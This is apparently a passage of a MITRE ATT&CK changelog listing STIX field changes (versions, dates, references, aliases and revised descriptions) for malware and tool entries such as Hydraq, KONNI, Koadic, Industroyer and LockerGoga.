| external_references[2]['url'] | https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/ | https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ |
| Description |
|---|
| [GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 16:15:20.371000+00:00 | 2022-07-29 19:44:21.016000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-09 18:59:27.117000+00:00 | 2022-01-12 16:21:44.692000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015) | [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ | |
| external_references | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | |
| external_references | https://www.symantec.com/connect/blogs/trojanhydraq-incident | |
| external_references | https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf | |
| external_references | https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html | |
| external_references | https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures | |
| external_references | https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-06 19:32:28.374000+00:00 | 2022-04-15 14:57:44.182000+00:00 |
| description | [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015) | [Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015) |
| external_references[1]['source_name'] | Hydraq | 9002 RAT |
| external_references[1]['description'] | (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) | (Citation: MicroFocus 9002 Aug 2016) |
| external_references[2]['source_name'] | Aurora | Roarur |
| external_references[2]['description'] | (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | 9002 RAT | MdmBot |
| external_references[3]['description'] | (Citation: MicroFocus 9002 Aug 2016) | (Citation: Novetta-Axiom) |
| external_references[4]['source_name'] | MicroFocus 9002 Aug 2016 | HomeUnix |
| external_references[4]['description'] | Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018. | (Citation: Novetta-Axiom) |
| external_references[5]['source_name'] | Symantec Elderwood Sept 2012 | Homux |
| external_references[5]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | (Citation: Novetta-Axiom) |
| external_references[6]['source_name'] | Symantec Trojan.Hydraq Jan 2010 | HidraQ |
| external_references[6]['description'] | Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018. | (Citation: Novetta-Axiom) |
| external_references[7]['source_name'] | ASERT Seven Pointed Dagger Aug 2015 | HydraQ |
| external_references[7]['description'] | ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018. | (Citation: Novetta-Axiom) |
| external_references[8]['source_name'] | FireEye DeputyDog 9002 November 2013 | McRat |
| external_references[8]['description'] | Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018. | (Citation: Novetta-Axiom) |
| external_references[9]['source_name'] | ProofPoint GoT 9002 Aug 2017 | Hydraq |
| external_references[9]['description'] | Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018. | (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) |
| external_references[10]['source_name'] | FireEye Sunshop Campaign May 2013 | Aurora |
| external_references[10]['description'] | Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018. | (Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010) |
| external_references[11]['source_name'] | PaloAlto 3102 Sept 2015 | ASERT Seven Pointed Dagger Aug 2015 |
| external_references[11]['description'] | Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018. | ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018. |
| external_references[11]['url'] | https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/ | https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'PaloAlto 3102 Sept 2015', 'description': 'Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.', 'url': 'https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/'} | |
| external_references | {'source_name': 'ProofPoint GoT 9002 Aug 2017', 'description': 'Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures'} | |
| external_references | {'source_name': 'FireEye Sunshop Campaign May 2013', 'description': 'Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html'} | |
| external_references | {'source_name': 'FireEye DeputyDog 9002 November 2013', 'description': 'Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html'} | |
| external_references | {'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'} | |
| external_references | {'source_name': 'Symantec Elderwood Sept 2012', 'description': "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", 'url': 'https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf'} | |
| external_references | {'source_name': 'MicroFocus 9002 Aug 2016', 'description': 'Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018.', 'url': 'https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ'} | |
| external_references | {'source_name': 'Symantec Trojan.Hydraq Jan 2010', 'description': 'Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.', 'url': 'https://www.symantec.com/connect/blogs/trojanhydraq-incident'} | |
| x_mitre_aliases | Roarur | |
| x_mitre_aliases | MdmBot | |
| x_mitre_aliases | HomeUnix | |
| x_mitre_aliases | Homux | |
| x_mitre_aliases | HidraQ | |
| x_mitre_aliases | HydraQ | |
| x_mitre_aliases | McRat |
| Description |
|---|
| [HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 19:21:39.068000+00:00 | 2021-11-29 21:48:51.029000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-07 16:02:38.320000+00:00 | 2022-09-27 18:20:48.473000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence', 'Joe Slowik - Dragos'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-13 19:33:41.189000+00:00 | 2022-10-20 20:37:50.556000+00:00 |
| external_references[3]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf | https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf |
| external_references[4]['url'] | https://dragos.com/blog/crashoverride/CrashOverride-01.pdf | https://dragos.com/blog/crashoverride/CrashOverride-01.pdf |
| external_references[5]['url'] | https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf | https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 17:45:34.380000+00:00 | 2021-11-29 12:41:28.009000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | ['Christiaan Beek, @ChristiaanBeek'] | |
| x_mitre_platforms | ['Windows'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-18 22:02:48.228000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 00:20:21.372000+00:00 | 2022-05-20 17:02:59.587000+00:00 |
| external_references[1]['url'] | https://unit42.paloaltonetworks.com/ironnetinjector/ | https://unit42.paloaltonetworks.com/ironnetinjector/ |
| Old Description | New Description |
|---|---|
| [KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020) | [KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-03 19:32:54.607000+00:00 | 2022-04-13 17:26:25.143000+00:00 |
| description | [KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020) | [KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) |
| external_references[1]['description'] | (Citation: Talos Konni May 2017) | (Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) |
| external_references[2]['source_name'] | Talos Konni May 2017 | Unit 42 Nokki Oct 2018 |
| external_references[2]['description'] | Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. | Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018. |
| external_references[2]['url'] | https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html | https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/ |
| external_references[4]['source_name'] | Unit 42 Nokki Oct 2018 | Medium KONNI Jan 2020 |
| external_references[4]['description'] | Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018. | Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020. |
| external_references[4]['url'] | https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/ | https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b |
| external_references[5]['source_name'] | Medium KONNI Jan 2020 | Talos Konni May 2017 |
| external_references[5]['description'] | Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020. | Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. |
| external_references[5]['url'] | https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b | https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html |
| x_mitre_version | 1.4 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Malwarebytes Konni Aug 2021', 'description': 'Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.', 'url': 'https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/'} |
| Description |
|---|
| [KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 14:18:07.086000+00:00 | 2022-05-11 14:00:00.188000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018) | [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:55:29.911000+00:00 | 2022-04-06 19:32:33.511000+00:00 |
| description | [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018) | [Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021) |
| external_references[1]['description'] | (Citation: Github Koadic) | (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) |
| external_references[2]['source_name'] | Github Koadic | MalwareBytes LazyScripter Feb 2021 |
| external_references[2]['description'] | Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. |
| external_references[2]['url'] | https://github.com/zerosum0x0/koadic | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Github Koadic', 'description': 'Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.', 'url': 'https://github.com/zerosum0x0/koadic'} |
| Old Description | New Description |
|---|---|
| [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) | [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Joe Slowik - Dragos'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:56:22.049000+00:00 | 2022-05-23 21:22:58.477000+00:00 |
| description | [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) | [LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019) |
| external_references[1]['source_name'] | Unit42 LockerGoga 2019 | CarbonBlack LockerGoga 2019 |
| external_references[1]['description'] | Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. | CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019. |
| external_references[1]['url'] | https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/ | https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/ |
| external_references[2]['source_name'] | CarbonBlack LockerGoga 2019 | Unit42 LockerGoga 2019 |
| external_references[2]['description'] | CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019. | Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. |
| external_references[2]['url'] | https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/ | https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/ |
| x_mitre_version | 1.3 | 2.0 |
| Description |
|---|
| [MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-20 14:52:23.369000+00:00 | 2022-07-29 19:48:28.725000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
